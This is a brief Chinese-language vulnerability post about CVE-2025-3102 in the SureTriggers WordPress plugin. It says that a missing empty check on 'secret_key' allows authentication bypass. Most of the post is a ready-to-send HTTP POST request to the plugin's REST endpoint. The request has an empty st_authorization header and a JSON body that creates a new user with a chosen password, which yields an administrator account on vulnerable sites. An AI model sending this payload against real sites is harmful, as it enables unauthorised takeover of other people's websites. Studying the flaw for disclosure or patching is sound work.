CVE-2025-3102 WordPress 任意用户创建
CVE-2025-3102 WordPress 任意用户创建
TtTeam 2025-05-18 04:34
SureTriggers:WordPress 的一体化自动化平台插件容易受到身份验证绕过的影响,由于缺少对“secret_key”的空值检查,导致创建管理帐户。
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Type: application/json
st_authorization:
{
"integration": "WordPress",
"type_event": "create_user_if_not_exists",
"selected_options": {
"user_email": "[email protected]",
"user_name": "testuser",
"password": "Test@1234"
},
"fields": [],
"context": {}
}